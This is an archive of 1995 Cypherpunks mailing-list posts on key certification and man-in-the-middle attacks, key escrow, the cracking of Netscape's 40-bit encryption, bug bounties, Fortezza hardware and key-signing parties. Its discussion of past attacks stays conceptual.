From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 08:14:28 PDT
To: cypherpunks@toad.com
Subject: My Last Message
Message-ID: <199510101513.LAA16827@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Oops!  My last message was a letter to the editor of the Economist.  I
forgot to mention that.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 11:28:55 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
Message-ID: <199510101828.LAA17871@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 AM 10/10/95 -0700, Hal wrote:
>Still, there is a problem here: how did the bank know that it _should_
>honor requests to withdraw money from bank account x if they are signed
>with a certain key?  How did it determine that that is a valid key, if it
>never had a secure channel to the person opening the account?  I think
>the answer is clearly that it cannot, that it must have had a secure
>channel.  Would a certificated key presented by Alice have been
>sufficient to create such a channel, do you think, or would a face to
>face meeting have been necessary?  (Or would an uncertificated key be
>adequate?)

I think you're probably right, though a one-way secure channel is enough.
If Alice has a trusted copy of the Bank's key, she can open her account and 
get her key certified by them without them having to trust her key (modulo 
little details like government requirements that banks get positive 
identification for their accountholders.)


>What if you are accessing the bank via a MITM?  Consider this example:
>Alice writes you a check, signed with a key (without her name) which
>has a credential from the bank saying that it will back up the check.
>But you need the bank's key to check the credential, so Alice gives it
>to you, or you get it from a public cache.  Suppose the bank's key is
>fake, and Alice is defrauding you.  How do you tell?  

With online clearing, you'd be able to tell because Alice's check cleared
and your bank (which we're assuming you've got a secure channel to)
says you've got the money.  Or in the case of digicash, because the cash
Alice's bank gave you was good.

>Wouldn't a certificate on the bank's key be necessary, one which ties the
bank's
>name and reputation to the key?
Maybe not, but it would sure help.

>Or what if the bank really is and has always been behind a MITM?  You say
>that it is more profitable for the bank not to abscond with your money.
>What about the MITM?  He doesn't make any profits until he cheats.  

Hmmm.  That one's interesting; he pays fakes everything for a while,
including paying out money, and then pulls off the Big Con.

>It seems to me that a lot of protocols assume the existence of secure
>channels.  Yet the MITM attack shows that public key cryptography does
>not in and of itself provide a secure channel.  This is a problem which
>IMO should not be ignored simply because it is inconvenient.

Agreed.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 11:28:39 PDT
To: Mike Fletcher <fletch@ain.bls.com>
Subject: Re: Java idea
Message-ID: <199510101828.LAA17877@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 10/10/95 -0400, Mike Fletcher <fletch@ain.bls.com> wrote:
>
>Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
>distributions :) has anyone given any thought to using Java to do some
>sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
>night and it could be feasable.  If you could get your key cruncher
>thread loaded into a good many browsers to run when idle . . . .  How
>many estimated copies of NS are there?  Anyone want to do the math? :)

Yeah, this was discussed; mix it in with a cool screen saver 
        "We're busy hacking Microsoft!" bouncing around the screen
and you could probably get a lot of people to try it, assuming of course
that it can run in offline mode conveniently, which I'm not sure
Netscape can yet (downloading the software, copying mozock/nullsock as
winsock, and restarting Netscape doesn't strike me as convenient,
which means it's also not an off-line mail/news reader yet.)

The negative part is that Java Bytecode interpretation is about 10x slower
than native code; you'd have to get people to download native libraries
for their platform to do the grunt work.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Tue, 10 Oct 95 08:35:09 PDT
To: cypherpunks@toad.com
Subject: truth in advertising: Netscape 1.1 on security
Message-ID: <199510101534.LAA22081@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Tue Oct 10 11:34:39 1995

This may be old news, but I don't recall seeing it on the list...

In version

		netscape -version

		Netscape 1.1N/export, 20-Apr-95; (c) 1995 Netscape Communications Corp.

I ran 'strings' on the binary, and only got one "about.*security" reference.

entering it as an URL
		
		about:security

yields the ironically humorous (when you consider all of the security bugs):

		Whatchew talkin' 'bout, Willis?

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMHqSl4JYfGX+MQb5AQFLKwP/RDsLzLxZkB18uSlV9lxp9nJ6uRilYYAE
m1gv4KKmtNnWLowlrr605iv1L7DUvQTRpGKANcLZDEsKZFYnjT/VBSN+/Jnoe6GX
VFNiSALrvX/IZjxf8FQ2xfyBYWF7J/DxTWP3QHjW9hc06Sx2fzCHdn4HItAteDwr
aWO8dM3XYzY=
=8udJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Tue, 10 Oct 95 10:24:28 PDT
To: cypherpunks@toad.com
Subject: Baltimore security conference, opening session
Message-ID: <9510101723.AA09997@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I attended the opening session of the National Computer Security
Conference this morning.  Actually it's been renamed to "Info systems
something-or-other", but I don't recall what.

The opening session is NIST's opportunity to take center stage, which
they did.  

The most interesting information to come out of the session was that
the govt is still pushing very hard for key escrow.  Most of the
speakers mentioned key escrow, and talked about the need for business
and govt to compromise to meet the needs of law enforcement blah blah
blah.

The "distinguished awardee" is Dennis Branstad, his speech was read by
Steven Walker.  In it, Branstad claimed that key escrow is a great
gift being provided by the government to the private sector, and that
companies want it a lot.

Stuart Katzke from NIST said that "our" goal (where "our" is
computer security professionals) is to deploy secure systems, but he
believes that "we" often lose sight of that goal.  Said that govt and
industry need to find compromises so that both can meet their goals
and get systems deployed.  I belive he mentioned export laws and key
escrow as areas for potential "compromises", but am not certain; if
not stated it was implied.  My interpretation is that he claims
those who object to key escrow are getting in the way of deploying
secure systems.

Someone, I don't recall who, pointed to the european "interest" in key
escrow, saying other govts might not allow systems to be deployed
without key escrow, thus key escrow was a good thing.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 10 Oct 95 13:43:34 PDT
To: cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <199510102043.NAA06895@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Duncan Frissell <frissell@panix.com> writes:
> Any movement towards a third cracking session.  I know poor Netscape seems
> like old hat but it might be good to do one more to establish a working
> server (if we have one).

I'd rather see a Microsoft challenge than a third Netscape 40-bitter.
We've made our point about 40-bit keys on Netscape's skull enough times,
and Microsoft is making smug product announcements referring to those
Netscape breaks.

Time to spread our joy around a bit, I'd say.

	Jim Gillogly
	Hevensday, 19 Winterfilth S.R. 1995, 20:42




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 11:10:39 PDT
To: owner-cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <9510101808.AA25419@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> >By the way, I suggest that Sun should offer a large money prize for
>> >the first significant security hole found the Java implementation. Its
>> >a tiny price to pay for security.

I notice that netscape just announced that they're doing this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 10 Oct 95 06:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <3046.9510101409@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hal <hfinney@shell.portal.com> writes:
>The POV I am really arguing against is the one that defines identity to
>be a key, that states that in communicating with a key you are by
>definition communicating with the person you have in mind.  The man in
>the middle attack does not exist because from your point of view the
>entity at the other end of the communication channel is just the MITM
>plus the person you think you are talking to.  This idea has been
>expressed many times by other people in this discussion, and it is this
>which I think is fundamentally flawed and even dangerous because it
>encourages the use of untested keys.  In fact it seems to define away
>the question of whether a key is real or fake.

It defines away the question of whether a key is real or fake because
the key itself can not be fake. Assuming strong encryption anything that
you send to the key can only be read by the key and anyone that he/she
choses to pass it on to (something that can not be stopped).

The only thing that can be fake about the key is the attributes
associated with it - whether the attributes concerned are true names
or the ability to use a bank account. Having a man in the middle when
no attributes are concerned is simply the same as talking to someone
who passes all of your messages on to a friend and then expresses
the friends opinion rather than his/her own back to you... something
that I can think of no possible way to stop. So although you are
talking talking to A the opinions expressed are those of B, and there
is no way of telling - in the same way as a man in the middle attack
(B may not even know that his/her arguments are being used by A
against you).

This argument reduces the problem to 'how do you validate key
attributes' as you can be sure that you are communicating securely
with the key (key's owner) but nothing else. With PGP currently the
only attribute that a key (X) may have is a name (true/pseudo) and
this attribute can be signed as valid by another key (Z). If you
accept the signature all you are doing is saying that you accept
the signing key's certification - ie an attribute signed by this
key (Z) is true. Eventually you have to just trust a key to have
taken reasonable care to ensure that any attribute that it has
signed is true - whether you are using a Web of Trust model or a
more centralised model such as accepting VeriSign certificates (or
your own - knowing exactly how much care you have taken to ensure
that the attribute that you have certified (signed) is true).


I believe that this is more removing a special case (treating the
true name differently from any other attribute) than defining away
the problem - even though the (MITM) problem does cease to exist.

Jon
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 12:22:51 PDT
To: cypherpunks@toad.com
Subject: Hal's Third Challenge?
Message-ID: <199510101920.PAA24628@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Any movement towards a third cracking session.  I know poor Netscape seems
like old hat but it might be good to do one more to establish a working
server (if we have one).

My interest arises out of the new Pentium 120 that has come my way and the
40,000 keys/second it gets running the 32-bit version of the Brue code.
Since my ISP is a local call, I might even be able to get away with an 8
hour PPP session to try the WIN95 client.

What's going on?

DCF

"Take your Writ of Ne Exeat Republica and shove it." --- words to keep
around to really impress the opposition with.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 10 Oct 95 08:01:36 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510101258.AA28275@alpha>
Message-ID: <24567.9510101425@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally <m5@dev.tivoli.com> writes:
>Don M. Kitchen writes:
> > >  If we are forced to exchange keys remotely, then perhaps some sort of
> > >  "proof" techniques could be used to establish to some level of
> > >  assurance that the remote entity I *think* is you is really you.  Or
> > 
> > So who is Pr0duct Cypher then? And why should I have to produce ID saying 
> > my name is Don, unless I'm proving my Real Name[tm] is Don.
>
> Right.  If we're forced to exchange keys remotely, I just have to deal
> with the possibility that I'm being spoofed.

You could take out a personal ad in a newspaper and print this:

	9D AF 6D 4D 8E 64 43 FC  D5 CB 9C 7A 36 C7 6D B9

(Pr0duct Cypher's key fingerprint).

That would mean that you could at least help Pr0duct Cypher determine
if there was a man in the middle.  If there was a MITM, once Pr0duct
was aware of this, P.C. could make efforts to change service provider,
or find novel entry points into public internet forums, and different
entry points in to the remailer net.

For the other direction, as a nym, if newspapers accepted anonymous
personal ads, an ad posted from a large city postal mail to the
newspaper, would be a reasonable assurance that the identity of the
person would be unkown.  Or you could try paper mailing some one your
instructions with cash to pay for the advert.  It is likely that a
randomly picked cypherpunk would do this for a nym.

You could even take out two simultaneous ads in two independent
newspapers which were secret split in two with XOR and a random
number, if you were really paranoid.

Now the MITM is reduced to denial of service attacks, by posting
similar keys, and saying "no that nym is an imposter I'm the real nym".
Denial of service is preferable to a MITM.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: benny@SIRIUS.COM (Thomas Gorman)
Date: Tue, 10 Oct 95 16:30:46 PDT
To: cypherpunks@toad.com
Subject: Netscape Crack
Message-ID: <v01510100aca0532f278c@[204.188.105.52]>
MIME-Version: 1.0
Content-Type: text/plain


Hey-

I'm a bit new to the Crypto Field but I know enough.  I heard that the
Cypherpunks ran a brute force attack on Netscape's 40-Bit code but I still
don't know how those two guys in Berkeley broke the 40-bit in just a few
minutes.  Can someone on this list explain it to me?  Thanks.

--tom gorman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Oct 95 08:50:32 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510101550.QAA29289@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by bdavis@dg.thepoint.net (Brian Davis) on 
Tue, 10 Oct 10:47 AM


>FYI the Justice Department requires degaussing a hard 
>drive before it can be declared surplus ...

-----

The Washington Post, Oct 9, 1995.

E-Mail That Comes Back And Bites. Even Deleted Messages
Can Be Recovered for Court [excerpts]


Computer sleuth John Jessen dredges computer files for
electronic embarrassments that their authors thought were
long gone. "Deleted" e-mail messages can pile up like
little time bombs until someone such as Jessen arrives,
carrying a court order and a stack of blank memory
cartridges.

"Can you really delete e-mail?  Sure," Jessen said. "Does
it happen as a common practice? No."

Jessen is the founder of Electronic Evidence Discovery
Inc., a Seattle company that since 1987 has been going
after computer evidence in civil lawsuits. The nation's
25 million to 40 million users of e-mail are growing more
comfortable with the medium. And more attorneys are
recognizing e-mail's potential as a source of unguarded
information about the companies they're suing.

"People are very candid talking around the coffee
machine." attorney Michael Patrick of Palo Alto, Calif.,
said. "They seem to behave the same way on the computer
system.

"They think they're speaking confidentially, so they're
off the cuff," he said. "They're very often insulting.
What they don't realize is it's all being recorded, and
often those recordings are stored for a very long time.
When you send a message, you lose control over where it
goes."

Many workers think their e-mail is private. It's not.
Federal law allows employers to monitor employees'
e-mail, and even if they don't, e-mail is fair game in
lawsuits. When someone sues a company, the rules of
discovery demand that the company produce all relevant
business records.

"The fact that they live in a computer rather than a file
cabinet doesn't make any difference to the court," said
Joan Feldman at Computer Forensics, another Seattle firm
that specializes in this work.

Often files retrieved include e-mail thought to have been
erased long ago. It survives because the diligent
computer system manager makes backup tapes of everything
on the system every night, then stores those tapes for
years.

And so the files persist and multiply, aided by
technological advances that continually add more storage
capacity, more automatic backups and more redundancies to
safeguard data from accidental erasure.

"The computer is like a file cabinet tbat can open its
own drawer, put a file on the copy machine and then slip
the copy into another cabinet," Jessen said. "Sometimes
I think it's alive."

Jessen and Feldman augment their high-tech detective work
by advising companies how to become less vulnerable to
computer snoops like themselves: They recommend regular
purges of old data, and they offer tips for avoiding
e-mail blunders in the first place. Rule No. 1: Don't put
anything on e-mail that you wouldn't want a jury to see.

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 10 Oct 95 13:58:46 PDT
To: cypherpunks@toad.com
Subject: Netscape starts their own "Hack Netscape" contest
Message-ID: <199510102058.QAA17999@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Starting today, Netscape is awarding those who are first to find
security bugs in Netscape 2.0 with cash prizes. (see their
homepage for more info)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Tue, 10 Oct 95 10:14:09 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510100030.AA29195@pepper.Eng.Sun.COM>
Message-ID: <199510101714.KAA07329@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 09 Oct 1995 17:30:38 -0700, cmcmanis@scndprsn.Eng.Sun.COM
(Chuck McManis) wrote:

> >By the way, I suggest that Sun should offer a large money prize for
> >the first significant security hole found the Java implementation. Its
> >a tiny price to pay for security.
> 
> I don't think the lawyers would let us. 

Pardon my French, but if your lawyers make it impossible to do
technical work correctly, isn't it time to get new lawyers?  I can't
see how offering a reward for reporting bugs could possibly be
objectionable to any rational lawyer.

This can be a VERY useful (and very inexpensive) debugging technique.
Didn't Knuth offer a cash reward to the first person to find each typo
in his "Fundamental Algorithms" series -- and then doubled the amount
each year?

It can also be a very useful teaching tool, in that it encourages
users to explore little-used corners of a system.

I applaud any company that has the guts to do it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 17:26:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
In-Reply-To: <9510102227.AA05494@usonian.itd.nrl.navy.mil.>
Message-ID: <199510110025.RAA10439@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael G. Reed <reed@itd.nrl.navy.mil> writes:

>All-
>	I remember there was some talk about Netscape adding Fortessa support
>on here a couple of days ago, so I thought I'd share this.  Marc Andreessen
>(president of technology for Netscape Communications) made a presentation
>today at the 18th National Information Systems Security Conference about
>Fortessa support within Netscape 2.0 to be shipping Beta Q2 '96 and final
>the second half of '96 (I haven't seen an official press release, but he more
>or less said they were announcing it today).  From his description, it looks
>like they are going to place the Fortessa drivers right in the SSL layer
>bypassing the software subsystem that currently exists in favor of the
>hardware (the software subsystem would still be utilized for non-Fortessa
>sessions).  He also commented that this was possibly a lead-in to other
>hardware subsystems in the future.  General reaction (at least in my
>immediate vicinity in the lecture hall) was quite positive -- looks like
>Fortessa is gaining even more momentum (Oracle had a talk about Fortessa
>support immediately after Netscape).  I wonder when Microsoft & company will
>jump on the bandwagon? :-)

There seems to be a convergence on this approach to a hardware
solution.  HP has been pushing for a model in which software with hooks
for hardware encryption will be allowed to get exported.  Then you can
plug in whatever level of encryption you are able to have in the
form of a card token.  Traditionally NSA has opposed export of software
with hooks but there are some indications that this method could be
accepted eventually.

Conceivably we could get to a situation where most encryption is done in
hardware, with the big, ubiquitous software packages like Netscape and
Word and their descendants just having hooks.  This would have some
advantages but overall I think it would be detrimental to cypherpunk
goals.  One of the biggest problems faced by those who want to restrict
access to encryption is how easy it is to do.  PGP and other programs are
virtually impossible to control.  They are easy to write and people can
spread them around trivially.

But hardware is not so simple.  If the only effective way to get
convenient communications with your net access software became to use a
hardware token, then it would be a lot easier to put on restrictions.  An
underground effort to manufacture and distribute tokens would be much
less practical than one to do the same thing for secure software.

I would like to see companies which add hooks for hardware also begin
adding hooks for software packages as well, at least in their domestic
versions.  In the case of Windows, for example, a DLL interface to
provide encryption functions should not be hard to add using a similar
API as for the hardware crypto card.  Similar interfaces should be
possible on other OS's.  Companies which do this will demonstrate their
commitment to making good quality cryptography available to their
customers.  A system which is "open" only to the extent that a hardware
card can be added is not sufficient.  A truly open system will allow
software add-ons as well.  Let's keep an eye on how this develops and let
the companies know how we feel.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 11 Oct 95 01:37:03 PDT
To: cypherpunks@toad.com
Subject: Elementrix POTP
Message-ID: <199510102120.RAA110954@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

Sorry to continue "beating a dead horse" here, but I forwarded a few
C-punks' messages regarding the Elementrix "Power One-Time Pad" to
this person, and I thought you might be interested in her (somewhat
cryptic <g>) response.

Forwarded message follows:
______________________________________________________________________
>Date: Tue, 10 Oct 1995 20:34:53 +0200
>From: Maia Aron <maia@elementrix.co.il>
>To: liberty@gate.net
>Subject: Re: POTP
>
>
>Hi, it took me a little while to respond; we've been getting a lot of 
>inquiries following the Interop show.
>
>The short answer is: everything that people are guessing we are, including 
>the guesses mentioned in the cypherpunks info you attached, is not what we 
>are. I.e., it's not an autokey cipher, it's not like DES, there is no way 
>to track relationships between yesterday's and today's ciphertexts. The 
>encryption is not done by using an encryption algorithm.
>
> Unfortunately, and we really mean unfortunately, we can only reveal what 
>"it is" to people who agree to a non-disclosure arrangement while we're 
>patent pending. Otherwise we would have no problem revealing the whole 
>method. So far, every international expert who has reviewed the method 
>agrees (after many, many hours and days of trying to find holes) that POTP 
>really does what we say it does.
>
>You can share this with whomever you'd like. Sorry I can't say much more.
>
>
>
>Regards,
>
>Maia Aron
>Vice President, Marketing
>Elementrix Technologies Inc.
>850 Third Avenue
>New York, NY 10022
>
>phone: 212-888-8879
>fax:   212-935-3882
>email: maia@elementrix.co.il
______________________________________________________________________
End of forwarded message.

So, I guess we know what they *aren't*, but not what they *are*...Is
this the first example (in modern history) of encryption that's *not*
done by using an encryption algorithm, or am I just missing something?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHrisW1lp8bpvW01AQEauQQAlFI8Xu3w1Zjo53rnejjp/UqVw9f9Gdfa
I4/bHqnpsJHI+W+HPbCzjWHV30lNJzMW1wWDBNpqNmjOr5jYmYJN7x0SX8QrXmCT
sZlrM0Pc+Pzc9OvsB/tw8T0bwXWPMi5b3qu5jQwHp5e+aujCdQRSr7digJscVhEN
i+WwbMEPFa8=
=Psa8
-----END PGP SIGNATURE-----
Regards, Jim Ray

Ray's Corolary to Murphy's Law:
"You will be spared _NOTHING_." -- Peter C. Ray [my dad].
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Tue, 10 Oct 95 10:35:16 PDT
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Making it more difficult to forge cancels (was: Re: FORGED CANCELS of posts on n.a.n-a.m)
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <199510101734.KAA26687@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 09 Oct 1995 23:12:35 -0400 (EDT), dlv@bwalk.dm.com (Dr.
Dimitri Vulis) wrote:

> Scenario 3.
> 
> Alice provides dial-up Usenet feed to/from several small sites run by Bob,
> Charles, and Dan. Their domains point to Alice via MX. Alice knows that if one
> of them spams Usenet, she'll be flamed and mailbombed. Alice adds her own
> "Cancel-Lock:" to each article she receives from these sites before feeding
> them to the rest of Usenet. Later she can cancel whatever articles have
> originated at B, C, D, and passed through her site.

I like this a lot, except:

If B doesn't add a Cancel-Lock to each article he sends, he loses the
ability (because of Alice's Cancel-Lock) to cancel his own articles.
Cancel-Locks should only be added (or honored?) if the message
contains a Cancel-Lock from the originator.

I'd also like to suggest that added Cancel-Locks be generated from
something less than the full message -- perhaps from just the message
ID.  Intermediate sites are unlikely to maintain full copies of all
messages, and ought to be able to generate cancels in response to a
(possibly corrupted) copy returned to postmaster from another site.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 17:37:40 PDT
To: benny@SIRIUS.COM (Thomas Gorman)
Subject: Re: Netscape Crack
Message-ID: <199510110036.RAA10457@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:30 PM 10/10/95 -0700, benny@SIRIUS.COM (Thomas Gorman) wrote:
>I'm a bit new to the Crypto Field but I know enough.  I heard that the
>Cypherpunks ran a brute force attack on Netscape's 40-Bit code but I still
>don't know how those two guys in Berkeley broke the 40-bit in just a few
>minutes.  Can someone on this list explain it to me?  Thanks.

Netscape uses a random session key, which feeds that 40-bit encryption.
How does it get a random session key without bothering the user to type
in random numbers?  By using the sources of randomness available to it,
like the system clock and process id.  Well, since you know when a message was
sent, you know what time it was (to the second), and there aren't very many
possible values of microseconds available.  There also aren't a lot of possible
processids, especially when you can run a process on the machine or convince
sendmail into telling you.  So instead of having 2^40 numbers to brute-force,
there were fewer than 2^30, often more like 2^20.  That's pretty fast.

The third crack was to notice that Netscape isn't very careful with array bounds
(in true C fashion), allowing you to push stuff on the stack by handing it a URL
with a very long name.  If you're careful, you can put interesting stuff on the
stack, so it does more than just crash in an ugly fashion.

However, three's a charm, and it's now time to Hack Microsoft, especially since
Microsoft has been saying bad things about Netscape, when almost every
encryption
product in a Microsoft tool is wimpy beyond repair, and when their newest and
niftiest stuff also has 40-bit keys for export versions, with out even as
much salt
as Netscape used.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 16:06:07 PDT
To: jpb@miamisci.org (Joe Block)
Subject: How to hold a key signing party?
In-Reply-To: <v01520c00aca09a7cd770@[199.227.2.175]>
Message-ID: <9510102259.AA28745@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Joe Block writes:
 > What I have in mind is to have everyone who is planning on attending send
 > me their key and its fingerprint....
 > 
 > This seems like a lot of work, which I don't mind, but if there is a more
 > efficient method, I'd like to know about it.

Doesn't make any difference to me, you nefarious agent of the Great
Man In The Middle you.



[ You got to get up *pretty early in the morning* to put one over on
*me* like that. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Tue, 10 Oct 95 15:00:39 PDT
To: cypherpunks@toad.com
Subject: How to hold a key signing party?
Message-ID: <v01520c00aca09a7cd770@[199.227.2.175]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've never attended a key signing party so I'd like to get some input on
the most effective way to run one.

What I have in mind is to have everyone who is planning on attending send
me their key and its fingerprint.  I'll collate the lot and print enough
copies of the list of names/fingerprints so that once everyone shows up,
each person can get a handout.  Everyone presents ID showing who they are
and reads off their fingerprint so the attendees can check them on their
handout.  Afterwards, I'll email all attendees the keys so they can sign
them and mail them back to me.  Once I receive the signed keys, I'll
redistribute them back to the owners & attendees.

This seems like a lot of work, which I don't mind, but if there is a more
efficient method, I'd like to know about it.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHrs/mGnwFiC3O2NAQGmMgf/SMeupR1BLe63riBNQklOGgGrLm+7yW3d
cqR42cdHnfxGLjy9Jwp+kmN1mHMf+EA+VIEZGC98Q0ZzwGzAnlibXmBOCHuC+6u2
ofRGLXtOB8WKJlJ2uXNjAeeOQcCEaRXmgbPhtqgb2YH7zcsiFRWMjpTi3MwLylXv
Vb7SIgayVKuGEx2h43xH0ChjJuyzsdJgRtW5G0e/oBjxcOpdtNrnj4zHmFqu9R/M
o4NN/W1S2unF3nvJmZkpKQT7EdVbRFHjdS/RfSqTcqf+WF+yXCo2NnUkdUat5uJh
QB1CpIn7Zpw/HZiAp5r87GFy0SiKvwS4QPpsvhIaCa0NGoNqqjhXUg==
=Jvxf
-----END PGP SIGNATURE-----

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ""Michael G. Reed"" <reed@itd.nrl.navy.mil>
Date: Tue, 10 Oct 95 15:28:25 PDT
To: cypherpunks@toad.com
Subject: Netscape & Fortessa
Message-ID: <9510102227.AA05494@usonian.itd.nrl.navy.mil.>
MIME-Version: 1.0
Content-Type: text/plain


All-
	I remember there was some talk about Netscape adding Fortessa support
on here a couple of days ago, so I thought I'd share this.  Marc Andreessen
(president of technology for Netscape Communications) made a presentation
today at the 18th National Information Systems Security Conference about
Fortessa support within Netscape 2.0 to be shipping Beta Q2 '96 and final
the second half of '96 (I haven't seen an official press release, but he more
or less said they were announcing it today).  From his description, it looks
like they are going to place the Fortessa drivers right in the SSL layer
bypassing the software subsystem that currently exists in favor of the
hardware (the software subsystem would still be utilized for non-Fortessa
sessions).  He also commented that this was possibly a lead-in to other
hardware subsystems in the future.  General reaction (at least in my
immediate vicinity in the lecture hall) was quite positive -- looks like
Fortessa is gaining even more momentum (Oracle had a talk about Fortessa
support immediately after Netscape).  I wonder when Microsoft & company will
jump on the bandwagon? :-)

-Michael

